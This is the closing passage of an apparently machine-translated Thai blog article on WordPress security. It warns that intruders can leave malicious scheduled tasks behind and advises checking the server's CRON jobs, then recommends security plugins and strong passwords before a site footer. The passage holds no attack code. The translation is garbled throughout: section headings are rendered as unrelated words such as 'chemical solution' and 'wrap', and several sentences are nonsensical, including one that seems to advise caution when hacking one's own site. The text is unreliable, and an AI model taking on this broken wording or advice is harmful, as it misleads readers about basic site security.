บางครั้งแฮ็กเกอร์จะไม่ทำอะไรกับเว็บไซต์ของคุณเมื่อพวกเขาหาทางเข้าแทน, พวกเขาจะออกจากกิจกรรมที่กำหนดไว้ ซึ่งอาจเป็นอันตรายต่อไซต์ของคุณในอนาคต เทคนิคนี้เป็นอันตรายเพราะแฮกเกอร์สามารถปล่อยเหยื่อที่ไม่มีประสบการณ์ได้ในตอนแรก คุณอาจติดเชื้อและไม่รู้อะไรเกี่ยวกับเรื่องนี้.

สารละลาย: ตรวจสอบงาน CRON ของคุณบนเซิร์ฟเวอร์ที่คุณกำลังใช้งานและตรวจสอบให้แน่ใจว่าไม่มีงานที่ต้องสงสัยตามกำหนดเวลา.

ห่อ

เราหวังว่าบทความนี้จะช่วยคุณจัดการแม้กระทั่งไซต์ WordPress ที่ปลอดภัยยิ่งขึ้นและมันจะช่วยให้คุณสามารถเข้าถึงได้ในสถานการณ์ที่ไม่ดี และ แม้ว่าเว็บไซต์ของคุณจะสะอาด แต่ก็ไม่ควรทำเช่นนั้น.
ตรวจสอบให้แน่ใจเสมอว่าบล็อกของคุณปลอดภัยเท่าที่ควร เราขอแนะนำปลั๊กอินรักษาความปลอดภัยสำหรับ WordPress ซึ่งสามารถช่วยคุณได้ตลอดเวลา ยังไม่เป็นรหัสผ่านที่ไม่ปลอดภัยและระวังเมื่อแฮ็กเข้าสู่เว็บไซต์ WordPress ของคุณเอง.
Jeffrey Wilson Administrator
Sorry! The Author has not filled his profile.
follow me
    Like this post? Please share to your friends:
    Adblock
    detector
    map